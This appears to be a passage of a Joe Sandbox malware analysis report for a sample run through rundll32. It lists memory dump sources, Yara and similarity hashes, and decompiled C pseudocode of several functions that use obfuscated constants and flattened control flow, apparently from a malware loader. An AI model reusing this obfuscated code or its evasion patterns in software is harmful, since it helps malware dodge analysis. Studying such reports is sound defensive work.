                                                                                                                          • Instruction Fuzzy Hash: 5621B2B6C00209EBCF48DFE5DA8689EBFB5FF40314F608189E411B6261D3B54B54DB95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                          • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                          • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                          • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                          • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                          • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                          • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                          • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                          • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                          • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                          • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                          • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                          • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E00794346(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                          				signed int _v4;
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				char _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				void* _t146;
                                                                                                                          				void* _t165;
                                                                                                                          				signed int _t170;
                                                                                                                          				signed int _t171;
                                                                                                                          				signed int _t172;
                                                                                                                          				signed int _t173;
                                                                                                                          				signed int _t174;
                                                                                                                          				void* _t177;
                                                                                                                          				intOrPtr* _t196;
                                                                                                                          				void* _t197;
                                                                                                                          				signed int* _t200;
                                                                                                                          
                                                                                                                          				_push(_a8);
                                                                                                                          				_t196 = __ecx;
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t146);
                                                                                                                          				_v8 = 0x1587dd;
                                                                                                                          				_t200 =  &(( &_v72)[4]);
                                                                                                                          				_t197 = 0;
                                                                                                                          				_v4 = _v4 & 0;
                                                                                                                          				_t177 = 0x762b00a;
                                                                                                                          				_v40 = 0x54d1b5;
                                                                                                                          				_t170 = 0x79;
                                                                                                                          				_v40 = _v40 / _t170;
                                                                                                                          				_v40 = _v40 ^ 0x0000b372;
                                                                                                                          				_v16 = 0xa1afdd;
                                                                                                                          				_v16 = _v16 >> 0xd;
                                                                                                                          				_v16 = _v16 ^ 0x0000050c;
                                                                                                                          				_v68 = 0x910a11;
                                                                                                                          				_t171 = 0x13;
                                                                                                                          				_v68 = _v68 / _t171;
                                                                                                                          				_v68 = _v68 << 2;
                                                                                                                          				_v68 = _v68 + 0x13e3;
                                                                                                                          				_v68 = _v68 ^ 0x00184f98;
                                                                                                                          				_v32 = 0xaf4665;
                                                                                                                          				_t172 = 0x26;
                                                                                                                          				_v32 = _v32 * 0x1c;
                                                                                                                          				_v32 = _v32 ^ 0x13220c8d;
                                                                                                                          				_v56 = 0xf39368;
                                                                                                                          				_v56 = _v56 + 0xf012;
                                                                                                                          				_v56 = _v56 / _t172;
                                                                                                                          				_v56 = _v56 ^ 0x000d8e66;
                                                                                                                          				_v36 = 0xa121b7;
                                                                                                                          				_v36 = _v36 + 0x3186;
                                                                                                                          				_v36 = _v36 ^ 0x00aec580;
                                                                                                                          				_v72 = 0x8bd634;
                                                                                                                          				_t173 = 0x16;
                                                                                                                          				_v72 = _v72 / _t173;
                                                                                                                          				_v72 = _v72 | 0xc3992ef3;
                                                                                                                          				_v72 = _v72 + 0xf49;
                                                                                                                          				_v72 = _v72 ^ 0xc3912c07;
                                                                                                                          				_v24 = 0xbc86c6;
                                                                                                                          				_v24 = _v24 | 0x4f3bdf6c;
                                                                                                                          				_v24 = _v24 ^ 0x4fbb36fd;
                                                                                                                          				_v64 = 0xf11315;
                                                                                                                          				_v64 = _v64 | 0x791eed70;
                                                                                                                          				_v64 = _v64 + 0xffff781b;
                                                                                                                          				_v64 = _v64 | 0xb4748ed7;
                                                                                                                          				_v64 = _v64 ^ 0xfdf43fb6;
                                                                                                                          				_v28 = 0xa9ea5e;
                                                                                                                          				_v28 = _v28 << 9;
                                                                                                                          				_v28 = _v28 ^ 0x53d38433;
                                                                                                                          				_v44 = 0xab8ea7;
                                                                                                                          				_t174 = 0x5e;
                                                                                                                          				_v44 = _v44 / _t174;
                                                                                                                          				_v44 = _v44 >> 5;
                                                                                                                          				_v44 = _v44 ^ 0x00061aeb;
                                                                                                                          				_v48 = 0xf3254f;
                                                                                                                          				_v48 = _v48 + 0xffff7d1c;
                                                                                                                          				_v48 = _v48 ^ 0x338af708;
                                                                                                                          				_v48 = _v48 ^ 0x337c7814;
                                                                                                                          				_v60 = 0xe02c97;
                                                                                                                          				_v60 = _v60 * 0x4f;
                                                                                                                          				_v60 = _v60 + 0xffffa06e;
                                                                                                                          				_v60 = _v60 + 0x8165;
                                                                                                                          				_v60 = _v60 ^ 0x4522059f;
                                                                                                                          				_v52 = 0x13fe8b;
                                                                                                                          				_v52 = _v52 >> 6;
                                                                                                                          				_v52 = _v52 + 0xffffbd6d;
                                                                                                                          				_v52 = _v52 ^ 0x000eeb0b;
                                                                                                                          				_v20 = 0x7ee5fd;
                                                                                                                          				_v20 = _v20 | 0xb1050693;
                                                                                                                          				_v20 = _v20 ^ 0xb17ba1e4;
                                                                                                                          				do {
                                                                                                                          					while(_t177 != 0x29b5a10) {
                                                                                                                          						if(_t177 == 0x761c4cc) {
                                                                                                                          							_push(_t177);
                                                                                                                          							_t165 = E0079AE64(_v68, _t177, _a4, 0, _v56, _t177, _v36,  &_v12, _v40, _v72);
                                                                                                                          							_t200 =  &(_t200[0xa]);
                                                                                                                          							if(_t165 != 0) {
                                                                                                                          								_t177 = 0x29b5a10;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							if(_t177 == 0x762b00a) {
                                                                                                                          								_t177 = 0x761c4cc;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t177 != 0x7f1be9f) {
                                                                                                                          									goto L13;
                                                                                                                          								} else {
                                                                                                                          									_push(_t177);
                                                                                                                          									E0079AE64(_v44, _t177, _a4, _t197, _v60, _t177, _v52,  &_v12, _v16, _v20);
                                                                                                                          									 *_t196 = _v12;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L6:
                                                                                                                          						return _t197;
                                                                                                                          					}
                                                                                                                          					_push(_t177);
                                                                                                                          					_push(_t177);
                                                                                                                          					_t197 = E00797FF2(_v12);
                                                                                                                          					if(_t197 == 0) {
                                                                                                                          						_t177 = 0xc410c1b;
                                                                                                                          						goto L13;
                                                                                                                          					} else {
                                                                                                                          						_t177 = 0x7f1be9f;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					goto L6;
                                                                                                                          					L13:
                                                                                                                          				} while (_t177 != 0xc410c1b);
                                                                                                                          				goto L6;
                                                                                                                          			}

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • Opcode ID: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                          • Instruction ID: 68fd74ad56c03007515950246381e73fe68fdcd5f2e238baa995c6302c346a10
                                                                                                                          • Opcode Fuzzy Hash: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                          • Instruction Fuzzy Hash: 277153B2109341AFD758CF61D98982BBBF1EBD9718F10890CF29556260D3B6C919CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E007A894B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                          				char _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				void* _t97;
                                                                                                                          				void* _t111;
                                                                                                                          				void* _t115;
                                                                                                                          				void* _t117;
                                                                                                                          				void* _t135;
                                                                                                                          				void* _t136;
                                                                                                                          				signed int _t137;
                                                                                                                          				signed int _t138;
                                                                                                                          				signed int _t139;
                                                                                                                          				signed int _t140;
                                                                                                                          				void* _t142;
                                                                                                                          				void* _t143;
                                                                                                                          
                                                                                                                          				_push(_a16);
                                                                                                                          				_t115 = __edx;
                                                                                                                          				_t135 = __ecx;
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t97);
                                                                                                                          				_v64 = 0x51cd23;
                                                                                                                          				_t143 = _t142 + 0x18;
                                                                                                                          				_t136 = 0;
                                                                                                                          				_t117 = 0x1f0121b;
                                                                                                                          				_t137 = 0x4d;
                                                                                                                          				_v64 = _v64 / _t137;
                                                                                                                          				_v64 = _v64 >> 9;
                                                                                                                          				_v64 = _v64 ^ 0x00032222;
                                                                                                                          				_v68 = 0xd4b8b7;
                                                                                                                          				_v68 = _v68 + 0xffffd2af;
                                                                                                                          				_v68 = _v68 ^ 0xd36e67b3;
                                                                                                                          				_v68 = _v68 ^ 0xd3b4aa1e;
                                                                                                                          				_v76 = 0x6efd74;
                                                                                                                          				_v76 = _v76 << 5;
                                                                                                                          				_v76 = _v76 ^ 0x2f6bad1f;
                                                                                                                          				_t138 = 0x34;
                                                                                                                          				_v76 = _v76 / _t138;
                                                                                                                          				_v76 = _v76 ^ 0x00af6c6b;
                                                                                                                          				_v52 = 0x9958c4;
                                                                                                                          				_v52 = _v52 + 0xffff4241;
                                                                                                                          				_v52 = _v52 ^ 0x009a50fc;
                                                                                                                          				_v56 = 0x2e84bf;
                                                                                                                          				_t139 = 0x72;
                                                                                                                          				_v56 = _v56 * 0x77;
                                                                                                                          				_v56 = _v56 ^ 0x15969b56;
                                                                                                                          				_v80 = 0x2bfbd3;
                                                                                                                          				_v80 = _v80 | 0xbb654ab5;
                                                                                                                          				_v80 = _v80 * 0x48;
                                                                                                                          				_v80 = _v80 >> 8;
                                                                                                                          				_v80 = _v80 ^ 0x00b72d27;
                                                                                                                          				_v60 = 0xb8f349;
                                                                                                                          				_v60 = _v60 / _t139;
                                                                                                                          				_v60 = _v60 ^ 0xcb885b35;
                                                                                                                          				_v60 = _v60 ^ 0xcb801a24;
                                                                                                                          				_v72 = 0xbf562d;
                                                                                                                          				_t140 = 0x42;
                                                                                                                          				_v72 = _v72 / _t140;
                                                                                                                          				_v72 = _v72 ^ 0xd5944d41;
                                                                                                                          				_v72 = _v72 ^ 0x4a8545c0;
                                                                                                                          				_v72 = _v72 ^ 0x9f1c34cb;
                                                                                                                          				_v48 = 0xda7c79;
                                                                                                                          				_v48 = _v48 << 0xc;
                                                                                                                          				_v48 = _v48 ^ 0xa7c49699;
                                                                                                                          				do {
                                                                                                                          					while(_t117 != 0x1f0121b) {
                                                                                                                          						if(_t117 == 0x20f75ec) {
                                                                                                                          							E00793DBC( &_v44, _t115, _v64, _v68, _v76);
                                                                                                                          							_t143 = _t143 + 0xc;
                                                                                                                          							_t117 = 0x98c428b;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t117 == 0x98c428b) {
                                                                                                                          								_t111 = E00792A21(_v52, _v56,  &_v44, _t135, _v80);
                                                                                                                          								_t143 = _t143 + 0xc;
                                                                                                                          								__eflags = _t111;
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									_t117 = 0xea94eac;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								_t149 = _t117 - 0xea94eac;
                                                                                                                          								if(_t117 != 0xea94eac) {
                                                                                                                          									goto L11;
                                                                                                                          								} else {
                                                                                                                          									E007AD97D( &_v44, _v60, _t149, _v72, _t135 + 4, _v48);
                                                                                                                          									_t136 =  !=  ? 1 : _t136;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L6:
                                                                                                                          						return _t136;
                                                                                                                          					}
                                                                                                                          					_t117 = 0x20f75ec;
                                                                                                                          					L11:
                                                                                                                          					__eflags = _t117 - 0x3544eb3;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				goto L6;
                                                                                                                          			}


























                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                          • Instruction ID: 30da9e71220394c0e4f974bb964a0a04f2f3727426bd8f6aaf14ea5763fbc8a3
                                                                                                                          • Opcode Fuzzy Hash: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                          • Instruction Fuzzy Hash: 01518B71108301AFC794CF22D98581BBBE5FBD8748F508A2EF59596120D776CA19CF87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E007AAC3A(void* __ecx) {
                                                                                                                          				signed int _v4;
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				void* _t82;
                                                                                                                          				signed int _t85;
                                                                                                                          				signed int _t86;
                                                                                                                          				void* _t88;
                                                                                                                          				void* _t96;
                                                                                                                          				void* _t97;
                                                                                                                          				signed int* _t99;
                                                                                                                          
                                                                                                                          				_t88 = __ecx;
                                                                                                                          				_t99 =  &_v28;
                                                                                                                          				_v24 = 0x5aa995;
                                                                                                                          				_v24 = _v24 | 0x25663b9c;
                                                                                                                          				_v24 = _v24 << 6;
                                                                                                                          				_t85 = 0x11;
                                                                                                                          				_v24 = _v24 / _t85;
                                                                                                                          				_t96 = 0;
                                                                                                                          				_v24 = _v24 ^ 0x05a97123;
                                                                                                                          				_t97 = 0xfe6f9f;
                                                                                                                          				_v16 = 0x9f09af;
                                                                                                                          				_v16 = _v16 + 0xcb37;
                                                                                                                          				_v16 = _v16 ^ 0x3a843722;
                                                                                                                          				_v16 = _v16 ^ 0x3a14bc19;
                                                                                                                          				_v28 = 0x7e93e4;
                                                                                                                          				_v28 = _v28 << 0xa;
                                                                                                                          				_t86 = 0x1a;
                                                                                                                          				_v28 = _v28 / _t86;
                                                                                                                          				_v28 = _v28 ^ 0x4056cd73;
                                                                                                                          				_v28 = _v28 ^ 0x49f3cf3d;
                                                                                                                          				_v4 = 0x47c602;
                                                                                                                          				_v4 = _v4 ^ 0xe3aa640e;
                                                                                                                          				_v4 = _v4 | 0xd85731ad;
                                                                                                                          				_v4 = _v4 ^ 0xfbf46e2b;
                                                                                                                          				_v8 = 0x201e29;
                                                                                                                          				_v8 = _v8 << 0x10;
                                                                                                                          				_v8 = _v8 * 0x48;
                                                                                                                          				_v8 = _v8 ^ 0x7b8200e2;
                                                                                                                          				_v12 = 0x18f9c1;
                                                                                                                          				_v12 = _v12 * 0x54;
                                                                                                                          				_v12 = _v12 << 6;
                                                                                                                          				_v12 = _v12 ^ 0x0c72dcb8;
                                                                                                                          				_v20 = 0xd6b502;
                                                                                                                          				_v20 = _v20 * 0x55;
                                                                                                                          				_v20 = _v20 << 0xd;
                                                                                                                          				_v20 = _v20 >> 0xb;
                                                                                                                          				_v20 = _v20 ^ 0x00034ef9;
                                                                                                                          				do {
                                                                                                                          					while(_t97 != 0xfe6f9f) {
                                                                                                                          						if(_t97 == 0x2f82a60) {
                                                                                                                          							_push(_t88);
                                                                                                                          							_push(_t88);
                                                                                                                          							_t82 = E0079474B();
                                                                                                                          							_t99 =  &(_t99[2]);
                                                                                                                          							_t97 = 0x6e030e4;
                                                                                                                          							_t96 = _t96 + _t82;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t97 != 0x6e030e4) {
                                                                                                                          								goto L8;
                                                                                                                          							} else {
                                                                                                                          								_t96 = _t96 + E007AC2F8(_v4, _t88 + 4, _v8, _v12, _v20);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L5:
                                                                                                                          						return _t96;
                                                                                                                          					}
                                                                                                                          					_t97 = 0x2f82a60;
                                                                                                                          					L8:
                                                                                                                          				} while (_t97 != 0xea6061f);
                                                                                                                          				goto L5;
                                                                                                                          			}

















                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E00798969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				intOrPtr _v44;
                                                                                                                          				void* _t84;
                                                                                                                          				signed int _t99;
                                                                                                                          				signed int _t103;
                                                                                                                          				void* _t109;
                                                                                                                          				signed int _t110;
                                                                                                                          
                                                                                                                          				_push(_a8);
                                                                                                                          				_t109 = __edx;
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				E007A20B9(_t84);
                                                                                                                          				_v40 = _v40 & 0x00000000;
                                                                                                                          				_v36 = _v36 & 0x00000000;
                                                                                                                          				_v44 = 0x779abe;
                                                                                                                          				_v20 = 0xb5573d;
                                                                                                                          				_v20 = _v20 ^ 0xbb0d078e;
                                                                                                                          				_t103 = 0x58;
                                                                                                                          				_v20 = _v20 * 0x30;
                                                                                                                          				_v20 = _v20 ^ 0x328c396d;
                                                                                                                          				_v16 = 0x362481;
                                                                                                                          				_v16 = _v16 + 0x16cb;
                                                                                                                          				_v16 = _v16 | 0xfe676eb4;
                                                                                                                          				_v16 = _v16 ^ 0xfe76a30b;
                                                                                                                          				_v32 = 0xc91798;
                                                                                                                          				_v32 = _v32 * 0x65;
                                                                                                                          				_v32 = _v32 ^ 0x4f59c84a;
                                                                                                                          				_v28 = 0xb97254;
                                                                                                                          				_v28 = _v28 / _t103;
                                                                                                                          				_v28 = _v28 ^ 0x000673a7;
                                                                                                                          				_v12 = 0xb6c56;
                                                                                                                          				_v12 = _v12 * 0x2a;
                                                                                                                          				_v12 = _v12 << 1;
                                                                                                                          				_v12 = _v12 * 0x5b;
                                                                                                                          				_v12 = _v12 ^ 0x5515a6e4;
                                                                                                                          				_v8 = 0x1f2e02;
                                                                                                                          				_v8 = _v8 * 0x66;
                                                                                                                          				_v8 = _v8 * 0x79;
                                                                                                                          				_v8 = _v8 + 0xffff535b;
                                                                                                                          				_v8 = _v8 ^ 0xdf3e36a5;
                                                                                                                          				_v24 = 0x692813;
                                                                                                                          				_v24 = _v24 >> 0xb;
                                                                                                                          				_v24 = _v24 + 0xffffcb9d;
                                                                                                                          				_v24 = _v24 ^ 0xfffb0f76;
                                                                                                                          				E007AD25E(_t103);
                                                                                                                          				_v16 = 0x87422f;
                                                                                                                          				_v16 = _v16 | 0xfc58150b;
                                                                                                                          				_v16 = _v16 ^ 0xfcdf572b;
                                                                                                                          				_v20 = 0xc6266d;
                                                                                                                          				_v20 = _v20 << 0xa;
                                                                                                                          				_v20 = _v20 + 0xffff7638;
                                                                                                                          				_v20 = _v20 ^ 0x18992a28;
                                                                                                                          				_t99 = E007A0AE0(_v20, _v16);
                                                                                                                          				_push(_v24);
                                                                                                                          				_t110 = _t99;
                                                                                                                          				_push(_t109);
                                                                                                                          				_push(_t110);
                                                                                                                          				_push(1);
                                                                                                                          				E007980E3(_v12, _v8);
                                                                                                                          				 *((short*)(_t109 + _t110 * 2)) = 0;
                                                                                                                          				return 0;
                                                                                                                          			}




















                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E007ADBEA(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				intOrPtr _v28;
                                                                                                                          				void* _t74;
                                                                                                                          				char* _t82;
                                                                                                                          				signed int _t84;
                                                                                                                          
                                                                                                                          				_push(_a12);
                                                                                                                          				_t82 = __edx;
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				E007A20B9(_t74);
                                                                                                                          				_v20 = _v20 & 0x00000000;
                                                                                                                          				_v16 = _v16 & 0x00000000;
                                                                                                                          				_v28 = 0x71ca23;
                                                                                                                          				_v24 = 0x57f692;
                                                                                                                          				_v12 = 0xd3252c;
                                                                                                                          				_v12 = _v12 + 0x4351;
                                                                                                                          				_v12 = _v12 + 0xffff5b79;
                                                                                                                          				_v12 = _v12 ^ 0x00d2c3f6;
                                                                                                                          				_v8 = 0xbb067e;
                                                                                                                          				_t84 = 0x11;
                                                                                                                          				_v8 = _v8 / _t84;
                                                                                                                          				_v8 = _v8 >> 8;
                                                                                                                          				_v8 = _v8 ^ 0xac5d3832;
                                                                                                                          				_v8 = _v8 ^ 0xac5d3334;
                                                                                                                          				_v8 = 0xab60c2;
                                                                                                                          				_v8 = _v8 << 0x10;
                                                                                                                          				_v8 = _v8 ^ 0x910d5570;
                                                                                                                          				_v8 = _v8 >> 4;
                                                                                                                          				_v8 = _v8 ^ 0x0f1cf547;
                                                                                                                          				if( *__edx != 0) {
                                                                                                                          					do {
                                                                                                                          						_v8 = 0xbb067e;
                                                                                                                          						_v8 = _v8 / _t84;
                                                                                                                          						_v8 = _v8 >> 8;
                                                                                                                          						_v8 = _v8 ^ 0xac5d3832;
                                                                                                                          						_v8 = _v8 ^ 0xac5d3334;
                                                                                                                          						_v8 = 0xab60c2;
                                                                                                                          						_v8 = _v8 << 0x10;
                                                                                                                          						_v8 = _v8 ^ 0x910d5570;
